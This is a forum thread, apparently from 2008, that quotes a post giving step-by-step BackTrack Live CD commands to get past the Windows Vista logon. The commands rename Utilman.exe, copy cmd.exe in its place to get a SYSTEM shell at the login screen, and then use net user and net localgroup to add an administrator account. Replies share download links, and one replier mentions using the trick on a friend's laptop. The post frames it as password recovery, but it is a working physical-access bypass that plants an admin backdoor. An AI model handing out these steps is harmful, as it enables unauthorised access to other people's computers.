whatsmypass.com wrote:
Using BackTrack Live CD which can be found ::here::
For those of you who forgot your spiffy new Vista Logon password. Here’s a quick and dirty way to make a new user account. BTW, this has been around since XP but still useful.
Boot into Backtrack and open a shell prompt:
cd /mnt (change directory to mounted drives)
ls (get the list of mounted drives)
cd sda1 (sda1 is the main hard drive)
cd Windows/ (change to the windows directory)
cd System32/ (change to the system directory)
mv Utilman.exe Utilman.old (backup original file)
cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
reboot
once rebooted, at vista logon screen, Press Windows key + U
To invoke Utility Manager ( A.K.A. CMD.exe)
Cmd.exe will spawn with ‘System’ privileges.
c:\>net user S00perAdmin mypassword /add
c:\>net localgroup administrators S00perAdmin /add
Reboot and log in with your newly added Admin account
I've used something similar on a friends laptop with visturd... it worked great...
Love is the answer
OK I've spent 15 minutes searching the site you linked to and I can't find a download link for a BackTrack Live CD. It is free isn't it?
Never mind, I found it on another website. For anyone else looking for a direct link, I think this is it. Kind of big, it's 700MB.
http://remote-exploit.org/backtrack_download.html
Never mind, I found it on another website. For anyone else looking for a direct link, I think this is it. Kind of big, it's 700MB.
http://remote-exploit.org/backtrack_download.html
Last edited by SpIk3y (2008-07-14 11:02:09)